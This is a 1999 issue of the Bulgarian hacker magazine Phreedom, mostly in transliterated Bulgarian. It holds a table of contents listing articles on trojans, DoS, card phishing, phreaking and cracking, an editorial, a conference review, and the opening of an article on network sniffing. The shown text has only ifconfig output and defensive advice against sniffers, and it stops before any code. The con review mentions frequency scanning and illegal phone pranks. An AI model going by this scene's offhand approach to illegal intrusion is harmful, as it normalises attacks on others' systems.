Warning: This text file's to be used for educational purposes only !
If you find any Anti-BTC, H/C/P/A/W materials to be offensive
STOP reading this text file right NOW!
Phreedom shall not be liable for any direct or indirect damages
caused by the use / misuse of the information below !
This .txt file should be distributed unmodified and free of charge
Reproductiong of any part of the materials below should be done
with the strict permission of the respective author
issue:#21 | ú ú ú ú ú ú ú ú ú ú | 21.12.1999::date
| |
| |
ù---\ \---\ /---ù ù---\ ù---\ /---/ /---\ /---\
,___/ | | ,__/ ,__/ | | ù | ù |
| ù ù \---ù \---ù \---ù \--- ù \-/
|
ù ú úú úúú[ m a g a z i n e ] : since 1 9 9 7
úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú
t e c h n i c a l : [h/c/p/a] : m a t e r i a l s
ú-=====[ www.phreedom.org ]============[ phreedom.orbitel.bg ]=====-ú
+ þ T O C þ +
: = | a r t i c l e | = - - - - - - - - - - = | a u t h o r | = :
: ú ú ú ú :
: ù ù :
: openwide :: worldwide ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú EXo :
: Phreedom Con - review ú ú ú ú ú ú ú ú ú ú General Failure :
: Aspects of Network Sniffing ú ú ú ú ú ú ú ú ú ú ú ú ú Kay :
: Windows NT Security ú ú ú ú ú ú ú ú ú ú ú ú Solar Eclipse :
: Trojan Horse Hiding w/Linux ú ú ú ú ú ú ú ú ú ú úIronCode :
: Several Box Schemes ú ú ú ú ú ú ú ú ú ú ú General Failure :
: Collecting Information from Remote Sitesú ú ú ú ú ManiaX :
: Denial of Service Attacks ú ú ú ú ú ú ú ú ú ú ú úIronCode :
: Phreaking RadioPhones and BigPhun ú ú ú ú ú ú ú LudPhreak :
: The Gentle Art of Trojan Horsing w/Windowsú ú ú ú ú ú EXo :
: QoS & Adv.Routing for Linux ú ú ú ú ú ú ManiaX & Renegade :
: Cracking Microangelo v2.1 ú ú ú ú ú ú ú ú ú ú ú ú ú úK.E. :
: Increasing the Resistence of Phone Line ú ú úStoiko & 1/2 :
: X Window Tips & Tricks ú ú ú ú ú ú ú ú ú ú ú Spite Master :
: Cyber Anonymity Tutorialú ú ú ú ú ú ú ú ú ú ú MiCRoPhoBIC :
: CC Phishing ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú úStar Gruhtar :
: Phone Line Filtersú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú Kuche :
: Trojan Horse Historyú ú ú ú ú ú ú ú ú ú ú ú Solar Eclipse :
: Otzwuk ot srestata s KPD w NDKú ú ú ú ú ú ú ú ú ú ú ú EXo :
: Lie Detectorú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú úStoiko & 1/2 :
: Blue in the Darkú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú ú Xoduz :
: ù ù :
: ú ú :
ú-=====================[ staff@phreedom.org ]======================-ú
/ ' ' \
\ [ ManiaX ] : founder /
/ \ [ EXo ] : editor in chief / \
/ ú \ [ Solar Eclipse ] : second editor / ú /
\_/ \ [ General Failure ] : foreign relations / \_/
- | ù \ [ IronCode ] : typografical fixer / ù | -
\ /\ [ kay ] : maillist / \ /
\/__\ /___\/
\// feel free to get in touch anytime \\/
<![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#00ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
openwide :: worldwide EXo
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Hh..h.h H.h.hHh.h..hHHHHHHHHHHhh.h..h.h.h.h.hhhh.hhhh..... . . . . . . .
HH..HH.
H .... . .... . . .h... .h ..h.h .h .h.hH.HH.H.H.h.h..hHHHHHHHHhhh HHH...
H..
H.h.H.Hh...h.h.h.HHHh
.hhhhhhHHhHHHHhHHhHhHHHHHHHHHHHHHHHHHhHHHHHHHH H H H H Hi, there :) !!!!!
^^^^^^^^^^^^
Ima li nqkoj tam?...
A nas ima li ni?
I move li da znae chowek...
Sled takowa globalno otsystswie w kakwo movesh da bydesh siguren?
PHM weche ne systestwuwa?
Pichowete ot staff-a sa se sduhali totalno?
Ili towa e prosto edno reklamno zabawqne, koeto da nagnegti fenowete i da
iznerwi wsichki do max ?
Ili puk wsichki sa tolkowa zaeti, che Phreedom weche ne e prioritet...
(mamka im myrzeliwa)?
Wdigaha shum, wdigaha, a sega kakwo? Kliumna im rabotata....
Maj ste trqbwa po edna Viagra...
Wsystnost az predpochitam RedBull (ManiaX sys sigurnost ste se zastupi
za Birata), i makar w momenta da nqmam pod ruka, moga da wi garantiram, che
pisha towa s euphoriq podobna na tazi, koqto mi dokarawa gorespomenatata
napitka. Chudesno e naistina, che chetete nowiq Phreedom, i makar w plan-yt
za introto da beshe wkliuchena tochka, w koqto se predpolaga da se
oprawdawam za zakusnenieto, nqmam nikakwo namerenie da se izwinqwam - nito
ot moe, nito ot imeto na ostanalite. Move da wi se struwa redno da turq
malko mazni epiteti i da dramatiziram, no towa nadli ste e ot polza nqkomu.
Horata, koito sa blizo do spisanieto, znaqt, che zabawqniqta nikoga ne sa
sluchajni.
.......Newz / Big NEWZ.....
Tradicionno e w towa prokleto intro da izbroqwam na kup nestata, koito
sa se sluchili prez wremeto m/u dwa broq i imat nqkakwo otnoshenie kym
Phreedom, no sega ste zapochna naprawo s GOLQMATA NOWINA, a imenno, che
spisanieto ste izliza weche i na ENGLISH. Na wuprosyt dali se opitwame da se
prawim na Phrack, move kategorichno da otgoworim s NE! Prichinata da zagubim
pochti 3 meseca w prewevdane na 500k materiali na English e, che malko ili
mnogo se interesuwame ot mnenieto na mevdunarodnata publika po otnoshenie na
awtorskite ni razrabotki. Oswen towa smqtame, che malko po malko dostigame
do niwoto na edno zadowolitelno chetiwo, koeto, makar i da e wse oste twurde
dalech ot ideqta ni za perfectno security related izdanie, bi predstawlqwalo
interes za opredelena grupa hora, osteteni ot darbata da razbirat bylgarski.
Momentyt s priwlichaneto na chuvdi awtori susto ne e za podcenqwane. W
krajna smetka, ako produlvim da izdawame Phreedom samo na bulgarski,
awtomatichno si otrqzwame wizata za nawun, a sledowatelno i pytq napred.
Swetyt trqbwa da razbere, che i tuk w nashe selo ima po nqkoj, deto da
ponaznajwa nestichko. No i w towa intro ste si spestq golqma chast ot
superlatiwite, koito move bi ochakwate da prochetete po adres na hitrecite-
phredomdviij (blah..). Edno obache e sigurno - w momenta sme w period na
golqmo izrastwane i samo wremto move da pokave dali ste uspeem da probiem
pokriwa na barakata, w koqto viweem.
.......Respect.....
W tozi duh bihme iskali da izrazim blagodarnostta si kym ORBITEL, koito
edinstweni ot cqlata sbirstina bg ISP-ta imat smelostta da kavat "ne" na
wsichkata swinstina i puritanstina w taq durvawa. Fenowete ni predostawiha
wuzmovnost da pusnem mirror na tehniqt server, kato towa be
naj-expeditiwnoto ugowarqne i puskane na mqsto na buglararski server, za
koeto mi e izwestno. Za tezi, koito wse oste ne mogat da razberat sto za
hora sa tipowete ot ORBITEL - www.hit.bg ste wi pomogne da si formirate
mnenieto. I da ne zabrawite: phreedom.orbitel.bg
.......Site.....
Samiqt site stana vertwa na osnowna poprawka, predimno delo na Solar-a.
Nabutano e zawidno kolichestwo DHTML, a lynx browse-waneto e pyti po-dobro.
Sistemata za linkowete se bazira weche na edin Perl script, taka che
update-waneto ste stawa dalech po-chesto i po-lesno. Goresto wi preporucham
da posetite links sekciqta, tyj kato sa dobaweni dosta interesni nowi
adresi.
Prerisuwah nqkoi ot kartinkite, no makar i mnogo da ni se iskashe da
preminem kym PNG format, ste pochakame pone do sledwasta godina, kogato se
nadqwame po-golqma chast ot browserite weche da poddyrvat rewoliucionniq
format za kompresirane na izobraveniq bez zaguba na kachestwo.
Weche movete da chetete spisanieto online w HTML format, i makar che ne
sme si igrali da razkrasqwame s kartinki, ste wi e po-udobno da accesswate
citiranite linkowe i da hwyrchite iz article-ite prez hyperwruzki.
.......Conference.....
Drugoto golqmo sybitie, stanalo edna ot naj-obsuvdanite temi w kysnite
chasowe na letnite dni, be subiteto, kodirano s imeto Phreedom Con'99.
[ Brief History ]: Prez 1998-ma godina w Dobrich se prowede subirane na
horata, koito prqko ili kosweno bqha swyrzani s Phreedom. Prakticheski
rezultat ot towa subirane nqmashe, no ideqta za syzdawane na evegodna
conferenciq ostana.
Dulgo wreme ne beshe qsno kyde tochno ste se prowede con-a i towa be
resheno na praktika w posledniq moment. Razwihri se i brutalen spor za towa
koj trqbwa da prisystwa i koj ne, kato w krajna smetka se reshi da bydat
pokaneni samo hora...:
1) Koito poznawame dostatuchno dobre, koito hareswame i na koito movem
da imame dowerie (ZADULVITELNO);
2) Wseki, kojto e w systoqnie da predstawi interesna za ostanalite tema
ili da nabawi 1 kasa bira - taksa uchastie ;))).
Ako smqtate, che e trqbwalo da prisystwate, a ne ste bil pokanen, to
qwno za dadeniq moment (summer '99) ste bili w golqma zabluda. Wse pak ne
zabrawqjte, che towa e Phreedom Con'99, a ne "Putki-majni" subor w Gradskata
Kruchma ili Metropolis party, na koeto se izsipwat edna duzina
metropolqnkowci.
Personi, koito bqha...."odobreni":
Dungeon Keeper (domakinyt ni), EXo, Fubar, General Failure, IronCode,
Kay, ManiaX, Ramirez a.k.a Lud Phreak, Spite Master, Solar Eclipse, Star
Gruhtar, Metalista.
Bqha pokaneni i Real Ender, Predator i KoRn, no, uwi, po uwavitelni
prichini te ne movaha da prisystwat. Az lichno osobeno syvalqwam za KoRn....
[ int main() ]: Poweche informaciq za towa kak tochno beshe na kupona ste
namerite w article-a po-dolu.
[ Returned value ]: PHM 21? Da... Golqma chast ot obema na tozi broj
predstawlqwa textow wariant na razrabotkite, s koito se predstawiha
prisystwalite na Con-a maniaci.
Obimslq se ideqta za WinterCon '99, tyj kato wsichki uchsatnici ostanaha
udowletworeni ot Phreedom Con'99.
.......Bitter story/Reality bites.....
Ne move obache wse hubawi raboti da se sluchwat....
Za nestastie nqkoi hora wse oste ne mogat da razberat kakwo predstawlqwa
Phreedom i kakwi sa wzaimootnosheniqta tuk pri nas. Nepriqtno mi e da go
kava, no sled izlizaneto na PHM20 se poqwiha mnogo negatiwni otzwuci po
powod statiite na TOKATA w broq. Nad 20-tina chitateli izpratiha pisma, w
koito burno protestiraha srestu tona w statiite mu. Stigna se do towa, che w
message board-a na spisanieto se poqwi i post, kojto nedwusmisleno ni
obwinqwashe, che sme stanali vertwa na natisk otwun. Na malko hora e
izwesten faktut, che dori za wuprosnite publikacii w PHM20 imashe golqm spor
dokolko e redno da se pusnat w pulniq im wariant. Na praktika nqma nisto
takowa. Wsichki nie smqtame, che Tokata ima kakwo da kave, no, uwi, ne znae
kak da go naprawi.
Opitahme se da podhodim diplomatichno kym problema, no rezultatut beshe
tochno protiwopoloven na ochakwaneto - gospodinut smetna, che toj trqbwa da
reshawa koq statiq da izliza i koq ne. Skoro sled towa, sled nqkolko ne
dotam dventulmenski izqwleniq ot strana na Tokata w posledwalite nqkolko
sedmici, edinodushno se reshi, che ste bude w negow i w nash interes
prekysnwaneto na wsqkakwi kontakti pomevdu ni. Negowi statii poweche nqma da
se poqwqt wyw Phreedom magazine, a poziciqta ni se demonstrira naj-tochno po
sledniq nachin:
*** 16:08 TOKATA_lv (xbg@lovetch74.pip.digsys.bg) has joined channel #phm
*** Mode change "+b *!*@lovetch*.pip.digsys.bg" on channel #phm by DAVID
*** Mode change "+b *!*@*love*.pip.digsys.bg" on channel #phm by DAVID
*** Mode change "+b *!*@*lovetch*.digsys.bg" on channel #phm by DAVID
*** Mode change "+b TOKATA*!*@*.*" on channel #phm by DAVID
*** TOKATA_lv has been kicked off channel #phm by DAVID (banned: request)
OFICIALNO SE IZWINQWAME NA WSICHKI CHITATELI, KOITO SA SE POCHUWSTWALI
ZASEGNATI OT TOZI KONFLIKT.
.......Messaging.....
A kyde move da ni napsuwate, ako mnogo sme wi kipnali wodata? Razbira
se, naj-dobroto mqsto e Phreedom-skiq msg.board, kojto e otworen za wsichki
washi komentari, predloveniq, idei, kritiki, psuwni i tqm podobni, ili
kazano s drugi dumi - wsichko, koeto smqtate, che trqbwa da e publichno
dostoqnie. Na praktika board-cheto e fakt oste ot sredata na Iuni, no sled
okolo mesec rabota wze, che grumna mnogo losho i chak na 15-ti Septemwri se
seti da probachka otnowo. Purwonachalnata mu ideq se razwi twurde mnogo i
weche se radwame na v3.0, koqto ima s kakwo da se pohwali. Ne mu e tuk
mqstoto na tyj taka che -
http://mboard.phreedom.org
ili
http://phreedom.orbitel.bg/mboard/
Ste ni e priqtno da chuem po edno "hoya".... :)
[Special 10x to maav za suppor-ta pri nqkoi ot po-pyrwite mi opiti da go
compiliram toq board]
.......License.....
NQMA DA IMA LICENZII!!! Kojto wse oste ne e razbral nowinata qwno e
gluh, slqp i nekydyren na wsichkoto otgore (che mu smurdqt i krakata).
Respect to: Veni Markovski. Koj k'woto ste da prikazwa - fenut naprawi
mnogo za da predotwrati licenziqta. Poqwiha se razni sluhowe, che BTC stqla
da stawa monopolen I'net dostawchik, koito imat swoqta baza, no za stastie
se oprewergaha. W dejstwitelnost grupirowkata OTE e predqwila iziskwane za
monopolen statut kato uslowie za zakupuwane na BTC, no bi bilo prekaleno
naglo ot strana na prawitelstwoto da skloni na podoben kapriz. No neka
probwat da prokarat takuw zakon - togawa ste widqt sto e to hora da napadat
sgradata na parlamenta s wili i sopi. W article po-dolu movete da prochetete
i kratuk otzwuk ot prowelata se predi otmqnata na licenziite oktrita sresta
s KPD i DKD w NDK.
Uwi, ima i loshi nowini - ot nowa godina taxuwaneto wyw wsichki
centrali, bili te cifrowi ili stupkowi, ste stawa po sistemata za taxuwane
po wreme. Towa e hitur hod ot strana na BTK-arite, koito znaqt, che rano ili
kusno trqbwa da likwidirat tiq stupkowi centrali. I w edin moment kato se
okave, che horata s "cifrowi" telefoni poluchawat po-kachestwena usluga ot
tezi s "analogowi" na edna i systa cena (kolkoto i da e greshno towa
naimenowanie, tyj kato kanalyt i w dwata sluchaq si e analogow), wsichki ste
se iurnat da si UPGRADE-wat phone-chetata. Taka BTC ste si izbie zagubite po
zakupuwane na tehnika. Bih kazal - zamisul na hieni i akuli.
.......Curious.....
Predi okolo mesec ot firma ACVILON se poluchi mail s podozritelniq
subject: ANTI_BTC. Sydyrvanieto be slednoto:
DSM Comunications e firma za razvoi i proizwodstwo na komunikacionni
ustroistwa.
Predlaga Modemi za 4 prowodni linii - short range modems 2-6km /like
Patton , RAD/ no na bulgarski ceni.
Proizvejdame radiomodemi na 1.3GHz, 11GHZ /SAT modems- microwawe/
za PPP wruzki po RS232 115kbps or 230kbps.
Veche i na 115KBPS - niama nujda ot BTK !!
Message-yt gowori sam za sebe si. Posetete za poweche info:
www.dsm.rousse.bitex.com
Note: Towa ne e platena reklama ili nesto podobno ! Ne si wyobrazqwajte..
.......Staff-response.....
BG Versiqta na PHM#21 e redaktirana i oformena ot IronCode. Lichno na
men woobste ne mi hareswa, che nowite redowe ne zapochwat s 4 simwola ident
Za syvalenie, obache, se usetih twurde kysno za toq fakt. Ako imate kakwo da
kavete po wuprosa - mboard-yt wi chaka.
I nakraq iskame da blagodarim na wsichki, koito ni pisaha ili izraziha
mnenieto si za spisanieto, wkliuchitelno i na tezi, koito ni psuwaha i
postoqnno ni podkanqha da go izkarame pustiqt mu PHM#21. 10X, guyz, we
really appreciate it ! (wyh na baba sladuranite...)
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#01ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Phreedom Con - Review General Failure
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
| ú ú ú ú ú ú ú ú ú ú | ascii: EXo
| |
| |
ú---\ \---\ /---ú ú---\ ú---\ /---/ /---\ /---\
,___/ | | ,__/ ,__/ | | ú | ú |
| ú ú \---ú \---ú \---ú \--- ú \-/
|
ú ú úú úúú[ C O N f e r e n c e ] : 1 9 9 9
j u l y / 28 - 31
d o w n t o w n: s o f i a
Kraen rezultat sled 2-ro poluwreme ot sreshtata:
PHREEDOM - BTC 1:0
fotograf na sybitieto : Star Gruhtar
pictures can be downloaded at : www.eventoftheyear.com
I. MALKO PREDGOWOR
Kakwo po princip predstawlqwashe tozi CON? Kato cqlo wyzmovnostta da se
syberem na edno mqsto, da pogoworim, da obmenim informaciq (da pijnem:)
izglevdashe sama po sebe si dosta primamliwa. Horata se syglasiha
(estestweno, ne moveshe i bez malko konflikti, koito polu4iha otravenie wyw
Phreedom message board- a, no towa e normalno). Ta ideqta beshe da se
syberem, wseki da si haresa daden topic i da zapoznae drugite s nego kakto
nameri za dobre - kato teoriq, prakti4esko prilovenie ili demonstraciq ili
pyk i dwete zaedno!
Za wynshnite hora CON-a prili4ashe na sybirane na edna suriq mladi hora,
koito prosto si wisqha ( wilnqha:) w edin prazen apartament. Atmosferata
obache wsyshtnost beshe super. Rqdko se slu4wa na edno mqsto da ste se
sybrali samo priqteli i pri towa da imash obshti interesi s wsi4ki tqh.
II.PRIGOTWQNE ZA CON-a
Ne move da ne otbelevim i 3-te gerojski chasa prekarani w pochistwane na
apartamenta, kojto sled usilena rabota pridobi naj-chitawiqt si wid ot dosta
wreme nasam. Mqstoto beshe izwestno edwa 2-3 dena predi subitieto i se
widqhme malko w chudo kogato se okaza, che suwsem ne e shega rabota da se
podgotwi mqsto za wremenno syvitelstwo na duzina goweda.
III.MQSTOTO
Mqstoto, kakto we4e znaete, beshe Sofiq. Edin dosta dobyr apartament s dobyr
sanitaren wyzel (B.Red: bih kazal... zadowolitelen), dolu-gore na prili4no
razstoqnie ot centyra na city-to (Bel.Iron - eb... taka de... i centura;-).
Host ni beshe Dungeon Keeper. Apartamenta imashe mnogo cool, anti-kuki
zaklu4washt mehanizym (be to maj prednazna4enieto ne beshe za kuki, ama az
taka si go iztylkuwah:) Kakto shte razberete po-dolu, imahme i wtori
apartament, no poneve towa beshe skromnata obitel na EXo, nqma da pisha za
neq ot syobraveniq za sigurnost. Wse pak, ako nqkoj sluvitel na BTC ili na
policiqta se interesuwa, da mi pishe, shte mu pratq to4niq adres i telefon -
wsi4ko w usluga na dyrvawata :-)
IV. PHREEDOM CON ZAPO4WA
Horata pristigaha, kakto e tradiciq, w razli4ni 4asowe - ot ranna sutrin do
we4erta. Dolu-gore reda na pristigane beshe sledniqt:
ManiaX, Fubar, kay + General Failure, RamireZ, METALISTA, Spite Master
Golqma 4ast ot tozi den beshe poswetena na setting up the LAN (4 PC's),
setting up the drinks - partida 1, testing the LAN (Star Gruhtar si
floodeshe s kef :). Denqt zawyrshi s THE MATRIX - i poneve wse nqkwi spynki
trqbwashe da ima - samo 1/2 ot filma, drugata 1/2 taka i ne poiska da trygne
(B.A. EXo, da te udari grym dano!!*$^%@&)
DAY2
Do obed narodyt se zanimawashe s kwo li ne i predimno prostotii poradi
lipsata na hrana. Kym 2 pm dojde hranata w promishleni koli4estwa (stigashe
dave za cql otdel BTCari:)) i drinks - partida 2.
[EXo]: Tuk move cqla epopeq da napisha za towa kak uspqhme da izharchim 170
hilki za po-malko ot 2 chasa w Metro-to i to samo za hrana i piene. Edwam
subrahme wsichkoto towa w kolata, a kogato raztowarihme produktite w
hladilnika Dungeon Keeper-a ne znaeshe towa negowiqt hladilnik li e ili
nqkakwa reklama idiliq.
V. SAMIQT CON
Sled soliden upload kym 4 pm zapo4na CON-yt po syshtestwo. Za toq den toj
zawyrshi kym 1-2 am, no posle prodylvi s prakti4eski demonstracii. Tuk
awtoryt se otdawa na synq kym 3 am.
DAY3
Sybuvdane malko predi obed. RamireZ se nalovi da si zamine:((((((, no pyk
dojde Spite Master:)))) Po edno wreme BTC reshiha i te da se razpishat za
sybitieto i sprqha telefona. CON bez telefon:)))) Edinstwenoto, koeto se
seshtahme, be da wiknem tehnik, no taka 100% shteshe da ima mortal kombat:)
Dobre, 4e se poqwi i druga, netehni4eska pri4ina da se mestim, i usetihme
nuvdata ot now host. Posledwa kratyk refreshment. EXo se pisa dobrowolec za
now host (drug prosto nqmashe) i zapo4na golqmoto transportirane - shtajgi,
hrana, piene, dobituk i t.n.
Prisitgnahme, setting up the LAN (we4e 3 PC's), kratko opoznawane na
obstanowkata i reshihme, 4e CON-yt trqbwa da prodylvi. Te4eshe si dobre toj
i s golemi prekyswaniq i napolowina ostanali budni zawyrshi kym 4 am.
Togawa, estestweno, ostanalite budni ne se otprawiha kym sleep, a nastana
dosta interesnata 4ast - malko zanimawki s ******* i ****** (tuk maj ne
trqbwa da pisha imenata na vertwite:) Dave nqkoi ot spqshtite se sybudiha.
[EXo]: Iskam da izrazq dulbokoto si razocharowanie ot alkoholnite
sposobnosti na ManiaX, kojto uv se slawi kato pruw alkoholik. Drugite susto
se naprawiha na babi i imam chuwstwoto, che edinstwenata mi kompaniq w
dobriqt zapoj be Metalista. Wse pak imashe gotin Rum.
Taka prodylvi do kym 10 am, kogato wryzkata zapo4na neponosimo da dropi
(poradi sybuvdaneto na mnogo sofiiski chatteri move bi:). Horata, koito
shtqha da pytuwat, otidoha da si oprawqt podrobnostite i sled towa zapo4na
priwevdane na obstanowkata w podobawasht wid. Kym 1 pm awtora napusna
mqstoto na sybitieto spqsht, dowolen i gotow za dogodina.
VI. RED NA GOWORENE
Tuk samo shte izlova reda na goworene na horata na CON-a. Nqma da pisha
temite, zashtoto gi ima po-dolu w samiq broj.
1. EXo - welcome & intro
2. ManiaX
3. kay
4. RamireZ
5. IronCode
6. General Failure
7. Solar Eclipse
8. Star Gruhtar
9. EXo
VII. THINGS WE LEARNED AT SUMMER CON'99 (& some results)
- na Star Gruhtar lubimoto zanimanie be da "hakwa meNTeta"
- General Failure taka i ne uspq da pusne na horata da pogledat malko
(4hrs:) ot LoveParade'99
- EXo i General Failure sa dosta dobri gotwa4i. [EXo]: oste mi durvat
oniq mi ti kebapchenca.
- ebawkite s mobifoni sa nezakonni, no i dosta zabawni:-)
- ne se opitwajte da se kypete w banqta na Dungeon Keeper!!
- ManiaX tazi godina ne dade powod da mu se smeni nick-a na Alcohollian,
kakto e naprawil minalata godina
- Bylgarski Dyrvawni Zheleznici SUXXXXXX
- mislq, 4e rekorda po spane beshe postawen ot Solar Eclipse
- a za rekorda po piene - ne znam ?!?!?!?!??
- polu4iha se otli4ni rezultati ot prowedeniq scan na sofijskite 4estoti
- 12 broq dobituk mogat da wecherqt na masa za 6-tima
P.S. Ami tolkowa moga da recover ot sybitiqta w Sofiq. Nadqwam se da ste
dobili nqkakwa (makar i minimalna) predstawa za 'the CON itself'.
PEACE ALL.
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#02ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Aspects of Network Sniffing kay
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Copyright 1999 kay <kay@phreedom.org>
Please contact the author and or Phreedom Magazine prior to
publication of any kind.
0. Abstract
Tazi statiq ima za cel da pokave i dwete strani na mrevowite snifferi -
kakwo sa za sistemnite administratori: kak da gi otkriem, kak da gi sprem; i
kakwo za programista. Wkljucheni sa primeri za Linux-specifichni funkcii,
kakto i za PCAP bibliotekata.
Sydyrvanie:
1. Network basics
1.1. Network design, hardware and software
1.2. Devices and interfaces
1.3. Preventing and detecting sniffers
2. Introduction to packet sniffing
2.1. Example of Linux SOCK_PACKET usage
2.2. Libpcap example
2.3. BPF Packet filter programs
2.4. Loadable kernel modules
3. Bibliography and additional files
1. Network basics
Nqkoi hora biha osporili, che snifferite sa neshto dosta iztyrkano: da, taka
e. Sled kato razpolagame s asimetrichno kodirashti algoritmi, se predpolaga,
che tezi problemi sa resheni. Wsyshtnost, wseki den hilqdi accounti,
kreditni karti i druga wavna informaciq "iztichat". Syshto taka sniferite sa
winagi polezen instrument za otkriwane na problemi w mrevowite protokoli,
kakto i za sledene na sigurnostta (IDS, Intrusion Detection Systems).
1.1. Network design, hardware and software
Nqkoi osobenosti na ustrojstwoto i dizajna na lokalnite kompjutyrni mrevi
pozwolqwat da se "podslushwa" komunikaciqta mevdu 2 stancii ot treti
kompjutri, koito sa swyrzani w syshtiq segment. Towa se dylvi na osobenost w
standarta IEEE 802.3 CSMA/CD (Carrier Sense Multiple Access with Collision
Detection) i po-specialno w algorityma za izprashtane, izpolzwan ot NIC's
(Network Interface Cards) za izbqgwane na kolizii. Koliziq nastypwa, kogato
2 stancii se opitat da predadat ednowremenno danni po mrevata. Tyj kato
wsichki izpolzwat edna i syshta chestotna lenta, towa wodi do wremenno
spirane na wsichki komunikacii. Imenno tozi algoritym w adapterite sledi
trafika po mrevata i izchakwa naj-udobniq moment "da se wkljuchi". Nqkoi
po-stari modeli mrevowi ustrojstwa syshto taka "podslushwat" wsichki paketi,
minawashti prez mrevata, za da reagirat na Broadcast syobshteniq.
Towa wse oshte ne e dostatychno za da move da se podsluswat wsichki wryzki:
Operacionnata sistema na wsqka stanciq wzima samo paketite, koito sa
prednaznacheni za neq i propuska ostanalite. Izkljuchenie prawqt Broadcast
paketite, chieto syshtestwuwane e wyzmovno samo w edin segment na lokalnite
mrevi (rqdko i w drugi sluchai) poradi imenno tezi osobenosti. Broadcast se
izprashta kym opredelen adres na mrevata, na kojto reagirat wsichki stancii.
Towa se izpolzwa za opredelqne na DHCP, BOOTP serveri, i drugi podobni
uslugi (Smurf ...).
1.2. Devices and interfaces
W Unix otdelnite fizicheski i logicheski mrevowi ustrojstwa sa predstaweni s
taka narechenite interfejsi. Mogat da se razgledat s komandata 'ifconfig' (w
nowite Linux sistemi i s 'ip'):
$ /sbin/ifconfig -a
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:249 errors:0 dropped:0 overruns:0 frame:0
TX packets:249 errors:0 dropped:0 overruns:0 carrier:0
Collisions:0
eth0 Link encap:Ethernet HWaddr 00:AC:3B:71:1D:D0
inet addr:192.168.0.1 Mask:255.255.255.0
MULTICAST PROMISC MTU:1500 Metric:1
RX packets:5357 errors:0 dropped:0 overruns:0 frame:0
TX packets:2397 errors:0 dropped:0 overruns:0 carrier:0
Collisions:0
Interrupt:12 Base address:0x420
ppp0 Link encap:Point-to-Point Protocol
inet addr:192.168.0.100 P-t-P:192.168.1.1 Mask:255.255.255.255
POINTOPOINT NOARP MULTICAST MTU:1500 Metric:1
RX packets:913 errors:1 dropped:0 overruns:0 frame:1
TX packets:920 errors:0 dropped:0 overruns:0 carrier:0
Collisions:0
W sluchaq - Linux sistema s loopback, edin Ethernet i edin PPP interfejs.
Wivda se, che eth0 interfejsyt e w promiscuous mode, t.e. poluchawa wsichki
paketi ot mrevata, dori i tezi, koito ne sa konkretno za dadeniq host.
Po-dolu shte widite kak move da si naprawite sobstwena takawa programa.
1.3. Kak da predotwratim snifferi w lokalnata mreva
Syshtestwuwat harduerni i sofruerni resheniq, koito prawqt po-sigurna cqlata
mreva. Prawilniqt dizajn i izgravdane na mrevowata topologiq sa predpostawka
za izoliranost na otdelnite mrevowi segmenti. Izpolzwaneto na Switch-owe,
kriptirashti Hub-owe i router-i, VPN namalqwat do golqma stepen shansa da se
podslushwat "sigurni" wryzki.
L0pth Heavy Industries obqwi softueren produkt za otkriwane na sniferi w
lokalna mreva (ili izobshto mrevowi adapteri w promiscuous revim) za NT i
Unix, kojto raboti na bazata na pasiwni priznaci i prowokira snifera da se
izdade chrez spoofnati paketi. W BugTraq ima interesna diskusiq po powod
efektiwnosta na AntiSniff, kakto i GPL AntiAntiSniff Sniffer. Velatelno e,
kogato si prowerqwate lokalnata sistema za promiscuous mode interfejsi, da
polzwate otdelna programa, a ne ifconfig, zashtoto tq move da byde
troqnizirana da ne go pokazwa. Wivte lspromisc.c po-nadolu.
Eto edin primer za zle izgradena lokalna mreva:
[Server]
|
[Bridge]--[Hub]---[Border router]------------ - - - Internet
|
|
[Another Hub]
/ | | | | | \
. . . . . . .
Po tozi nachin wsichki stancii shte mogat da podslushwat trafika mevdu
nashiq i sysedniq server, ili pyk e-mail parolata na Joe na drug server w
Internet. Trqbwa da se izpolzwat switch-owe wmesto koncentratori, da se
razdelqt mashinite na grupi i po wyzmovnost da se obosobqt w VLAN mrevi i
t.n. i t.n. Pomnete che naj-sigurnite kompjutri sa izkljuchenite. No neka
ostawim towa za sega, tyj kato tazi statiq ima druga osnowna tema.
2. Introduction to Libpcap
Wsqka operacionna sistema predstawq swoj sobstwen metod za dostyp do
naj-niskoto niwo na mrevata: Berkley Packet Filter pri BSD, Char device pri
Solaris, specialen tip socket pri Linux i t.n. Towa prawi trudno syzdawaneto
na portable programi, koito izpolzwat tezi funkcii i se kompilirat bez
promqna na razlichni tipowe Unix. Bibliotekata PCAP (ot Packet Capture) e
